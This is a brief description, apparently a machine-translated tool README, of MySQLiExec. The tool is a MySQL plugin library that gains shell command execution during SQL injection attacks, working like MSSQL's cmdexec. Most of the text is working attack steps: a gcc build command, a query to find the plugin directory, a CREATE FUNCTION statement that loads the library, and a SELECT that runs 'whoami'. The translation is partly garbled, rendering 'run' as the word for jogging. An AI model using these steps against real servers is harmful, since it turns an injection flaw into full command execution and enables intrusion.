在进行 mysql 服务器上的 sql 注入时，MySQLiExec 是一个类似于 mssql\'s cmdexec 的实用工具

MySQLiExec mssql's cmdexec-like for mysql, 在利用 mysql 服务器上的 sql 注入时很有用。 说明：将编译好的库写入mysql的plugins目录并加载，可以像mssql的cmdexec一样运行shell命令 编译示例： gcc -fPIC -Wall -I/usr/include/mysql -shared -o sqliexec.so sqliexec.c // on ubuntu with installed headers 查找插件目录： SHOW VARIABLES LIKE ' %plugin% ' ; 安装： CREATE FUNCTION sqliexec RETURNS STRING SONAME ' sqliexec.so ' ; 跑步： SELECT sqliexec( ' whoami ' );